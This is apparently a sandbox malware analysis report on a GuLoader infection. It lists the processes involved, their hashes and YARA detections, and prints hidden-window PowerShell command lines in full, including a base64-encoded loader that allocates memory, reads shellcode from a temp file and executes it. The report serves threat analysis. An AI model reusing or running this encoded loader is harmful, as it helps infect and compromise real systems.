MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: cvtres.exe PID: 5176 Parent PID: 1528

General

Start time:	11:25:56
Start date:	25/11/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP"
Imagebase:	0x9b0000
File size:	46832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ieinstal.exe PID: 6228 Parent PID: 6584

General

Start time:	11:26:17
Start date:	25/11/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\internet explorer\ieinstal.exe
Imagebase:	0xca0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.15018322075.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2072 Parent PID: 4620

General

Start time:	11:26:43
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
Imagebase:	0xf70000
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 7980 Parent PID: 2072

General

Start time:	11:26:43
Start date:	25/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff675b50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 5176 Parent PID: 4620

General

Start time:	11:26:51
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
Imagebase:	0xf70000
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 2528 Parent PID: 5176

General

Start time:	11:26:51
Start date:	25/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff675b50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2692 Parent PID: 5176

General

Start time:	11:26:53
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA=
Imagebase:	0xf70000
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.16237325177.0000000009770000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: powershell.exe PID: 7972 Parent PID: 2072

General

Start time:	11:27:08
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAF